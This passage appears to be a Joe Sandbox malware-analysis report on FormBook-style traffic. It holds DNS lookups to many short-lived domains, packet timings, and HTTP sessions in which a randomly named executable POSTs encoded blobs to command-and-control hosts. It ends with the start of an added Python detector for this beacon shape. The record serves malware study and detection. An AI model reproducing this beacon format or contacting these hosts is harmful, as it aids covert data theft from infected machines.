                                                                            Dec 6, 2024 17:37:45.724373102 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:46.782130003 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:46.782362938 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:46.782407999 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:46.785820961 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:46.905585051 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:38:00.995675087 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:01.115773916 CET8049886172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:01.115905046 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:01.163803101 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:01.283626080 CET8049886172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:02.677033901 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:02.797312021 CET8049886172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:02.797363043 CET4988680192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:03.698577881 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:03.818363905 CET8049892172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:03.819113016 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:03.833421946 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:03.953969955 CET8049892172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:05.348890066 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:05.474625111 CET8049892172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:05.474678040 CET4989280192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:06.367798090 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:06.489490986 CET8049898172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:06.492808104 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:06.510576010 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:06.630774021 CET8049898172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:06.630887032 CET8049898172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:08.020986080 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:08.141393900 CET8049898172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:08.141530991 CET4989880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:09.040638924 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:09.160520077 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:09.160644054 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:09.171531916 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:09.292165041 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.821933985 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.821950912 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.821973085 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.821984053 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.822163105 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.822339058 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.852727890 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852749109 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852761030 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852910995 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852924109 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.852937937 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.854649067 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.885850906 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.886045933 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.942487001 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.942528963 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:11.942709923 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:11.950690031 CET4990880192.168.2.12172.67.162.39
                                                                            Dec 6, 2024 17:38:12.071609020 CET8049908172.67.162.39192.168.2.12
                                                                            Dec 6, 2024 17:38:17.706614017 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:17.826637983 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:17.826817036 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:17.844314098 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:17.964191914 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:18.925440073 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:18.925489902 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:18.925503969 CET8049929199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:18.925602913 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:19.349114895 CET4992980192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:20.368021965 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:20.487875938 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:20.488034964 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:20.509768009 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:20.629483938 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:21.596107960 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:21.596133947 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:21.596177101 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:21.596621990 CET8049935199.59.243.227192.168.2.12
                                                                            Dec 6, 2024 17:38:21.596663952 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:22.021079063 CET4993580192.168.2.12199.59.243.227
                                                                            Dec 6, 2024 17:38:23.041205883 CET4994180192.168.2.12199.59.243.227
Timestamp                          | Source IP    | Dest IP | Trans ID | OP Code            | Name                        | Type           | Class       | DNS over HTTPS
-----------------------------------|--------------|---------|----------|--------------------|-----------------------------|----------------|-------------|---------------
Dec 6, 2024 17:35:53.835146904 CET | 192.168.2.12 | 1.1.1.1 | 0xc1e1   | Standard query (0) | www.betmatchx.online        | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:35:59.071702957 CET | 192.168.2.12 | 1.1.1.1 | 0x8fee   | Standard query (0) | www.egldfi.xyz              | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:04.305788994 CET | 192.168.2.12 | 1.1.1.1 | 0xae38   | Standard query (0) | www.remedies.pro            | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:21.353147984 CET | 192.168.2.12 | 1.1.1.1 | 0xf025   | Standard query (0) | www.egyshare.xyz            | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:36.180921078 CET | 192.168.2.12 | 1.1.1.1 | 0x8fc9   | Standard query (0) | www.appsolucao.shop         | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:51.415005922 CET | 192.168.2.12 | 1.1.1.1 | 0xfc7f   | Standard query (0) | www.samundri.online         | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:37:05.961952925 CET | 192.168.2.12 | 1.1.1.1 | 0x8b80   | Standard query (0) | www.happyjam.life           | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:37:21.180865049 CET | 192.168.2.12 | 1.1.1.1 | 0x63b4   | Standard query (0) | www.t19yd.top               | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:37:36.466502905 CET | 192.168.2.12 | 1.1.1.1 | 0xb9fc   | Standard query (0) | www.atendefacil.info        | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:37:51.790978909 CET | 192.168.2.12 | 1.1.1.1 | 0x1811   | Standard query (0) | www.uynline.shop            | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:00.478566885 CET | 192.168.2.12 | 1.1.1.1 | 0x8d3e   | Standard query (0) | www.sitioseguro.blog        | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:16.970326900 CET | 192.168.2.12 | 1.1.1.1 | 0x5dd6   | Standard query (0) | www.dating-apps-az-dn5.xyz  | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:31.948913097 CET | 192.168.2.12 | 1.1.1.1 | 0x27f8   | Standard query (0) | www.whisperart.net          | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:46.964334011 CET | 192.168.2.12 | 1.1.1.1 | 0xeb7f   | Standard query (0) | www.ana-silverco.shop       | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:39:01.558156013 CET | 192.168.2.12 | 1.1.1.1 | 0x9007   | Standard query (0) | www.bloodbalancecaps.shop   | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 17:35:54.054686069 CET | 1.1.1.1 | 192.168.2.12 | 0xc1e1 | Name error (3) | www.betmatchx.online | none | none | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:35:59.296875000 CET | 1.1.1.1 | 192.168.2.12 | 0x8fee | Name error (3) | www.egldfi.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:05.067002058 CET | 1.1.1.1 | 192.168.2.12 | 0xae38 | No error (0) | www.remedies.pro | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:05.067002058 CET | 1.1.1.1 | 192.168.2.12 | 0xae38 | No error (0) | www.remedies.pro | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:21.943192959 CET | 1.1.1.1 | 192.168.2.12 | 0xf025 | No error (0) | www.egyshare.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:21.943192959 CET | 1.1.1.1 | 192.168.2.12 | 0xf025 | No error (0) | www.egyshare.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:36.701433897 CET | 1.1.1.1 | 192.168.2.12 | 0x8fc9 | No error (0) | www.appsolucao.shop | appsolucao.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:36:36.701433897 CET | 1.1.1.1 | 192.168.2.12 | 0x8fc9 | No error (0) | appsolucao.shop | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:36:51.719197989 CET | 1.1.1.1 | 192.168.2.12 | 0xfc7f | No error (0) | www.samundri.online | samundri.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:36:51.719197989 CET | 1.1.1.1 | 192.168.2.12 | 0xfc7f | No error (0) | samundri.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:37:06.732167006 CET | 1.1.1.1 | 192.168.2.12 | 0x8b80 | No error (0) | www.happyjam.life | | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:37:21.681685925 CET | 1.1.1.1 | 192.168.2.12 | 0x63b4 | No error (0) | www.t19yd.top | t19yd.top | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:37:21.681685925 CET | 1.1.1.1 | 192.168.2.12 | 0x63b4 | No error (0) | t19yd.top | | 38.47.207.164 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:37:37.443259001 CET | 1.1.1.1 | 192.168.2.12 | 0xb9fc | No error (0) | www.atendefacil.info | | 208.115.225.220 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:37:52.355501890 CET | 1.1.1.1 | 192.168.2.12 | 0x1811 | No error (0) | www.uynline.shop | uynline.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:38:00.992701054 CET | 1.1.1.1 | 192.168.2.12 | 0x8d3e | No error (0) | www.sitioseguro.blog | | 172.67.162.39 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:00.992701054 CET | 1.1.1.1 | 192.168.2.12 | 0x8d3e | No error (0) | www.sitioseguro.blog | | 104.21.15.100 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:17.699719906 CET | 1.1.1.1 | 192.168.2.12 | 0x5dd6 | No error (0) | www.dating-apps-az-dn5.xyz | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:32.689207077 CET | 1.1.1.1 | 192.168.2.12 | 0x27f8 | No error (0) | www.whisperart.net | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:47.246732950 CET | 1.1.1.1 | 192.168.2.12 | 0xeb7f | No error (0) | www.ana-silverco.shop | | 104.21.90.137 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:38:47.246732950 CET | 1.1.1.1 | 192.168.2.12 | 0xeb7f | No error (0) | www.ana-silverco.shop | | 172.67.156.195 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 17:39:02.379075050 CET | 1.1.1.1 | 192.168.2.12 | 0x9007 | No error (0) | www.bloodbalancecaps.shop | bloodbalancecaps.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 6, 2024 17:39:02.379075050 CET | 1.1.1.1 | 192.168.2.12 | 0x9007 | No error (0) | bloodbalancecaps.shop | | 108.179.253.197 | A (IP address) | IN (0x0001) | false
                                                                            • www.remedies.pro
                                                                            • www.egyshare.xyz
                                                                            • www.appsolucao.shop
                                                                            • www.samundri.online
                                                                            • www.happyjam.life
                                                                            • www.t19yd.top
                                                                            • www.atendefacil.info
                                                                            • www.sitioseguro.blog
                                                                            • www.dating-apps-az-dn5.xyz
                                                                            • www.whisperart.net
                                                                            • www.ana-silverco.shop
                                                                            • www.bloodbalancecaps.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.12 | 49715 | 13.248.169.48 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:36:05.205074072 CET | 514 | OUT | GET /8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.remedies.pro
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 6, 2024 17:36:06.304842949 CET | 381 | IN | HTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Fri, 06 Dec 2024 16:36:06 GMT
                                                                            content-length: 260
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 5a 3d 30 6e 6b 70 6d 5a 62 78 39 5a 34 50 32 26 42 48 70 74 5a 36 46 3d 4d 51 55 38 68 67 71 4a 43 66 4a 6b 4b 77 75 72 71 35 51 58 53 54 63 73 41 53 63 55 48 77 33 52 79 75 79 39 49 32 39 65 77 79 72 46 48 4c 4a 69 4f 35 45 55 4a 63 38 64 68 6a 4c 68 6b 50 31 77 2b 6b 4d 46 69 4b 58 31 4a 66 39 6e 69 33 6a 4b 74 31 57 47 2f 5a 70 62 6c 4b 58 75 48 4e 44 78 49 37 74 6d 72 42 4c 46 76 31 53 6d 50 64 64 2b 53 68 44 48 34 46 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.12 | 49717 | 13.248.169.48 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:36:22.082973957 CET | 778 | OUT | POST /440l/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.egyshare.xyz
                                                                            Origin: http://www.egyshare.xyz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 204
                                                                            Referer: http://www.egyshare.xyz/440l/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 49 4a 5a 47 53 48 64 42 7a 55 76 70 79 43 4e 67 6c 59 4f 65 53 48 45 37 73 71 4a 42 62 6d 70 67 42 33 32 50 78 6b 6a 48 4c 57 6b 33 4f 62 72 45 66 4f 54 2f 41 2b 65 77 50 30 46 47 65 4e 48 72 6d 2b 49 71 2b 56 66 48 5a 76 74 36 37 54 36 57 39 73 39 72 69 50 6c 38 6d 56 63 34 46 52 4d 35 62 4d 5a 4d 39 5a 4a 58 39 6c 6d 4c 73 41 73 33 47 74 70 31 48 33 50 30 31 6e 44 2b 34 63 38 62 68 69 42 72 6e 34 38 55 6a 70 6f 65 66 55 5a 34 42 65 49 62 71 2f 63 68 47 7a 73 57 35 2b 65 73 31 66 31 6f 6b 62 69 34 74 52 77 49 38 43 63 64 4a 78 2b 48 44 77 3d 3d
                                                                            Data Ascii: BHptZ6F=wvRL/7AjjEcZIJZGSHdBzUvpyCNglYOeSHE7sqJBbmpgB32PxkjHLWk3ObrEfOT/A+ewP0FGeNHrm+Iq+VfHZvt67T6W9s9riPl8mVc4FRM5bMZM9ZJX9lmLsAs3Gtp1H3P01nD+4c8bhiBrn48UjpoefUZ4BeIbq/chGzsW5+es1f1okbi4tRwI8CcdJx+HDw==
Dec 6, 2024 17:36:23.170094967 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.12 | 49718 | 13.248.169.48 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:36:24.754694939 CET | 798 | OUT | POST /440l/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.egyshare.xyz
                                                                            Origin: http://www.egyshare.xyz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 224
                                                                            Referer: http://www.egyshare.xyz/440l/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 4f 70 70 47 56 6b 46 42 36 55 76 6f 75 53 4e 67 76 34 50 58 53 48 49 37 73 75 5a 52 62 51 35 67 42 55 69 50 79 6c 6a 48 4d 57 6b 33 47 37 72 4e 51 75 54 4b 41 2b 69 65 50 78 39 47 65 4e 37 72 6d 2f 34 71 2b 6c 6a 41 59 2f 74 38 39 54 36 55 69 38 39 72 69 50 6c 38 6d 56 49 43 46 52 45 35 61 38 4a 4d 73 49 4a 55 78 46 6d 49 72 41 73 33 43 74 70 75 48 33 50 53 31 6c 37 45 34 66 45 62 68 6a 78 72 6e 74 49 58 71 70 6f 45 43 45 5a 6f 53 4d 4a 31 6c 50 6f 7a 4c 56 51 49 33 64 2b 74 30 5a 34 79 37 70 71 75 34 53 6b 46 78 56 6c 74 45 79 44 4f 59 2b 77 30 72 47 62 64 6d 54 2b 44 78 53 50 6e 49 77 4e 67 67 42 67 3d
                                                                            Data Ascii: BHptZ6F=wvRL/7AjjEcZOppGVkFB6UvouSNgv4PXSHI7suZRbQ5gBUiPyljHMWk3G7rNQuTKA+iePx9GeN7rm/4q+ljAY/t89T6Ui89riPl8mVICFRE5a8JMsIJUxFmIrAs3CtpuH3PS1l7E4fEbhjxrntIXqpoECEZoSMJ1lPozLVQI3d+t0Z4y7pqu4SkFxVltEyDOY+w0rGbdmT+DxSPnIwNggBg=
Dec 6, 2024 17:36:25.845731020 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.12 | 49719 | 13.248.169.48 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:36:27.424245119 CET | 1811 | OUT | POST /440l/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.egyshare.xyz
                                                                            Origin: http://www.egyshare.xyz
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Length: 1236
                                                                            Referer: http://www.egyshare.xyz/440l/
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 77 76 52 4c 2f 37 41 6a 6a 45 63 5a 4f 70 70 47 56 6b 46 42 36 55 76 6f 75 53 4e 67 76 34 50 58 53 48 49 37 73 75 5a 52 62 51 78 67 42 6b 2b 50 79 47 4c 48 4e 57 6b 33 61 72 72 49 51 75 54 54 41 2b 4b 61 50 78 68 34 65 49 33 72 6d 5a 45 71 34 57 37 41 53 2f 74 38 78 7a 36 4a 39 73 39 45 69 50 31 67 6d 56 59 43 46 52 45 35 61 36 46 4d 38 70 4a 55 7a 46 6d 4c 73 41 73 7a 47 74 6f 67 48 30 2f 73 31 6a 6e 75 34 76 6b 62 69 44 68 72 6b 62 6b 58 6f 4a 6f 43 42 45 59 33 53 4d 46 32 6c 50 45 2f 4c 52 51 75 33 61 4b 74 32 73 68 59 6b 4b 32 68 6b 78 59 45 39 69 70 58 4a 31 6a 39 42 63 56 4e 74 41 72 46 70 79 43 66 36 41 61 56 59 78 59 6a 7a 55 4c 6a 64 77 44 6d 63 4f 56 70 49 70 48 33 30 44 57 62 41 73 2b 69 61 69 66 58 54 6c 61 5a 6c 52 41 6e 41 72 44 53 72 52 50 77 37 70 56 6e 65 6d 69 38 46 7a 43 62 5a 50 6e 38 4b 4e 76 56 36 75 41 37 31 41 43 50 4b 35 34 62 68 30 62 37 38 51 78 66 65 58 70 44 75 7a 33 77 50 77 36 33 53 43 2b 32 62 79 56 71 6a 53 4e 54 4d 4d 59 6c 2f 6a 2f 6f 51 51 [TRUNCATED]
                                                                            Data Ascii: BHptZ6F=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 [TRUNCATED]
Dec 6, 2024 17:36:28.509149075 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                            content-length: 0
                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.12 | 49720 | 13.248.169.48 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:36:30.076904058 CET | 514 | OUT | GET /440l/?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.egyshare.xyz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 6, 2024 17:36:31.168250084 CET | 381 | IN | HTTP/1.1 200 OK
                                                                            content-type: text/html
                                                                            date: Fri, 06 Dec 2024 16:36:31 GMT
                                                                            content-length: 260
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 42 48 70 74 5a 36 46 3d 39 74 35 72 38 50 74 73 74 42 55 47 66 71 70 49 65 68 35 58 6e 45 69 73 77 44 39 6c 75 4d 69 45 65 56 73 61 6a 74 77 37 5a 33 64 71 44 6b 47 42 38 6d 4c 47 43 68 59 39 43 71 66 4b 45 61 48 79 45 76 4b 4a 44 7a 41 4e 59 59 58 4a 6d 4f 38 58 68 30 4b 31 53 66 4a 44 35 78 65 78 2f 4f 68 77 73 50 5a 5a 35 44 45 61 53 55 73 68 66 71 59 2b 32 36 42 64 38 79 4d 3d 26 52 5a 3d 30 6e 6b 70 6d 5a 62 78 39 5a 34 50 32 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P2"}</script></head></html>
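
Every request in the sessions above has the same shape regardless of which host it is sent to: the fixed Mac Chrome/39 User-Agent, Connection: close, a four-character directory as the path, a GET carrying two query parameters (one short token, one long opaque blob), and POSTs carrying a single form field holding an opaque blob with Origin and Referer pointing back at the same host and path. The only replies seen are a bare 405 with an empty body and a 200 whose entire content is a JavaScript bounce to /lander. The following is an added example, not part of this Joe Sandbox report, that parses requests of that shape and reports which of these traits each one matches, plus a classifier for the two reply types. The two FormBook requests are trimmed copies of the captures above; the benign control request, the trait names and the thresholds in the regexes are the editor's own choices.

```python
"""Flag HTTP requests that share the beacon shape captured in this report.
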